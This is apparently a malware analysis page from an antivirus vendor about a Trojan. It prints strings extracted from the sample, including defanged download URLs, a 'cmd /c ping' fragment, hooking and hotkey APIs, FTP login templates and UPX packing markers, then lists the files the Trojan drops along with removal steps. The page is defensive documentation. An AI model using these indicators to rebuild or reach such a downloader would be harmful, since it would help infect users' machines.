<assemblyIdentity type="win32" name="Microsoft.VC90.CRT" version="9.0.21022.8" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
hXXp://abcdfdfd.oss-cn-shanghai.aliyuncs.com/xy.txt
hXXp://pan.lanzou.com/p/561515405
cmd /c ping 1.1.1.1 -n 1 -w
SeeYouAgain.mp3
hXXp://music.163.com/outchain/player?type=2&id=33937655&auto=1&height=66
RightHereWaiting.mp3
hXXp://music.163.com/outchain/player?type=2&id=3313653&auto=1&height=66
IAmYou.mp3
hXXp://music.163.com/outchain/player?type=2&id=2919622&auto=1&height=66
hXXp://music.163.com/outchain/player?type=2&id=27808044&auto=1&height=66
hXXp://music.163.com/outchain/player?type=2&id=41665696&auto=1&height=66
hXXp://music.163.com/outchain/player?type=2&id=27955653&auto=1&height=66
hXXp://music.163.com/outchain/player?type=2&id=410042104&auto=1&height=66
hXXp://music.163.com/outchain/player?type=2&id=436514312&auto=1&height=66
hXXp://music.163.com/outchain/player?type=2&id=439915614&auto=1&height=66
hXXp://music.163.com/outchain/player?type=2&id=31445772&auto=1&height=66
WeDon'tTalkAnymore.mp3
hXXp://music.163.com/outchain/player?type=2&id=409654891&auto=1&height=66
p_sshh
hXXp://VVV.520cxzm.com/xy.html#
anonymous@123.com
.exe|.rar|.zip|.gif|.jpg|.mp3|.rm
VBScript.RegExp
Microsoft.XMLDOM
:hXXp://rj.baidu.com/soft/detail/17153.html?ald,
R].Vk
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
1.2.18
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
MSH_SCROLL_LINES_MSG
MSWHEEL_ROLLMSG
ole32.dll
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
F%D,3
iphlpapi.dll
SHLWAPI.dll
MPR.dll
VERSION.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
(*.htm;*.html)|*.htm;*.html
VVV.dywt.com.cn
index.dat
desktop.ini
:%d) |
%I64d%s
:0{}%s
:%d)%s
[%s:%d]
Range: bytes=%s-
[%s:%d]
PASS %s
PASS ******
USER %s
E:\e5\dev\e\static_link\static_libs\source\downlib\mystrlib.cpp
SIZE %s
PORT
User-Agent: %s
Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Referer: %s
Host: %s
GET %s HTTP/1.1
Cookie: %s
%d, %s
\\192.168.0.129\TCP\1037
NSPlayer/9.0.0.2980; {%s}; Host: %s
rmff_fix_header: assuming data.size=%i
rmff_fix_header: assuming data.num_packets=%i
rmff_fix_header: assuming prop.num_packets=%i
rmff_fix_header: setting prop.data_offset from %i to %i
rmff_fix_header: correcting prop.num_streams from %i to %i
rmff_fix_header: correcting prop.size from %i to %i
%s %s %s
Session: %s
Cseq: %u
%*s %s
%*s %u
CSeq: %u
rtsp://%s:%i
rtsp://%s:%i/%s
ClientID: Linux_2.4_6.0.9.1235_play32_RN01_EN_586
GUID: 00000000-0000-0000-0000-000000000000
[%s:%d]
User-Agent: RealMedia Player Version 6.0.9.1235 (linux-2.0-libc6-i386-gcc2.95)
Range: npt=%s-
%s/streamid=1
%s/streamid=0
Transport: x-pn-tng/tcp;mode=play,rtp/avp/tcp;unicast;mode=play
If-Match: %s
RealChallenge2: %s, sd=%s
Title: %s
Copyright: %s
Author: %s
real: Content-length for description too big (> %uMB)!
Require: com.real.retain-entity-for-setup
SupportsMaximumASMBandwidth: 1
Bandwidth: %u
Challenge1: %s
hash output: %x %x %x %x
hash input: %x %x %x %x
stream=%u;rule=%u,
Illegal character '%c' in input.
(*.avi)|*.avi
RICHED32.DLL
RICHED20.DLL
WPFT532.CNV
WPFT632.CNV
EXCEL32.CNV
write32.wpc
Windows Write
mswrd632.wpc
Word for Windows 6.0
wword5.cnv
Word for Windows 5.0
mswrd832.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
html32.cnv
%d%d%d
rundll32.exe shell32.dll,
;3 #>6.&
'2, / 0&7!4-)1#
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
zcÁ
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
GetCPInfo
WinExec
RegCreateKeyExA
RegOpenKeyExA
RegCloseKey
GetViewportOrgEx
SetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
OffsetViewportOrgEx
ShellExecuteA
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
UnregisterHotKey
RegisterHotKey
GetKeyState
InternetCanonicalizeUrlA
InternetCrackUrlA
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
DeleteUrlCacheEntry
`.rdata
@.data
OJ.Wr
hXXp://VVV.kelepan.com/space_mieshi_5865.html
hXXp://pan.baidu.com/s/1i3n8qn7
1, 0, 6, 6
- Skin.dll

%original file name%.exe_2972_rwx_10000000_0003E000:

`.rsrc
L$(h%f
SSh0j
msctls_hotkey32
TVCLHotKey
THotKey
\skinh.she
}uo,x6l5k%x-l h
9p%s m)t4`#b
e"m?c&y1`Ð<
SetViewportOrgEx
SetViewportExtEx
SetWindowsHookExA
UnhookWindowsHookEx
EnumThreadWindows
EnumChildWindows
`c%US.4/
!#$<#$#=
.text
`.rdata
@.data
.rsrc
@.UPX0
`.UPX1
`.reloc
hJK.ZH
O.qt0
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
1, 0, 6, 6
- Skin.dll

SearchProtocolHost.exe_1240:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610

SearchFilterHost.exe_1848:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\dh[1].jb (606 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\goodiedll[1].jpg (313265 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\goodie\libuv.dll (200 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\goodie[1].jpg (41985 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\goodie\msvcr100.dll (773 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\goodie\MSVCP100.dll (421 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\MSVCP100[1].jpg (62505 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\goodie\TheWorld.exe (2 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\goodie\lua.dat (1 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\goodie\msvcp71.dll (503 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\goodie\libtcmalloc.dll (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\msvcr100[1].jpg (195745 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\goodiedll2[1].jpg (41681 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\atl100[1].jpg (28673 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\msvcp71[1].jpg (62361 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\goodie\ctfmon.exe (136 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\goodie\atl100.dll (138 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\lua[1].jpg (25 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\llq[1].jpg (460385 bytes)
    C:\speedhack-i386.dll (181 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Average: 2 (1 vote)


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now